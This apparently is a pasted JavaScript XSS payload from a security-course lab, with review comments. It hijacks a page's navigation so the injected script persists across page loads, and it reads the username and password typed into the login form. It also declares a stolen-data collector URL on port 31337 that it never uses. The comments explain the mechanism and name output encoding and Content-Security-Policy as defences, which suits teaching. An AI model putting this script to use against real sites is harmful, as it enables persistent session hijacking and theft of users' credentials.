
Untitled

a guest
Nov 16th, 2017
text 1.29 KB | None | 0 0
  /**
   * Load `href` into the current <html> element and, once it has loaded,
   * re-attach click handlers to the page's links, search button and login
   * button so that each of them calls proxy() again instead of navigating.
   *
   * Security-relevant behaviour, as visible in this block:
   *  - The document is never navigated by this code, so window.location (and
   *    the query string the payload is read from) stays as it was on the
   *    first load while the displayed content changes.
   *  - The login handler reads the values typed into #username and #userpass
   *    from page script. Cookie flags such as HttpOnly do not cover form
   *    fields; what stops this class of script is output encoding at the
   *    reflection point and/or a Content-Security-Policy.
   *  - NOTE(review): the reflection point is not on this page; presumably it
   *    is the `q` parameter of ./search — confirm.
   *
   * @param {string} href  URL handed to jQuery's .load().
   */
  function proxy(href) {
    // Runs after .load() has replaced the document content.
    function rehook() {
      $("html").show();

      var defenseLevel = 0;
      // Declared but never read anywhere in this block.
      var collector = "http://127.0.0.1:31337/stolen";

      // Value of the second query-string parameter. This throws when the URL
      // carries fewer than two parameters, and then nothing below is bound.
      var pairs = window.location.search.substr(1).split("&");
      var payload = pairs[1].split("=")[1];

      // The rebuilt search URL is only shown in an alert; it is not requested.
      var url = "./search?xssdefense=" + defenseLevel.toString() + "&q=" + payload;
      alert(url);

      $("#query").val("pwned!");

      // Home link and "search again" button: reload the start page in place.
      function onHome(e) {
        log("clicked home");
        e.preventDefault();
        proxy("./");
      }

      // Search button: reload the search page in place.
      function onSearch(e) {
        log("clicked search-btn");
        e.preventDefault();
        proxy("./search");
      }

      // History entries: follow the entry's own href, again in place.
      function onHistoryItem(e) {
        var target = $(this).attr("href");
        log("clicked history item");
        e.preventDefault();
        proxy(target);
      }

      // Login button: the typed credentials are read by this script before
      // the login request is sent, and the username is shown in an alert.
      function onLogin(e) {
        e.preventDefault();
        log("clicked login");

        var typedUser = $("#username").val();
        var typedPass = $("#userpass").val();

        alert(typedUser);

        var request = {
          type: "POST",
          url: "http://trurl.cs.illinois.edu/login",
          dataType: "text",
          data: {
            username: typedUser,
            password: typedPass
          },
          success: function () {
            alert("successful login");
          }
        };
        $.ajax(request);

        proxy("./login");
      }

      $("#bungle-lnk, #search-again-btn").click(onHome);
      $("#search-btn").click(onSearch);
      $(".history-item").click(onHistoryItem);
      $("#log-in-btn").click(onLogin);
    }

    $("html").load(href, rehook);
  }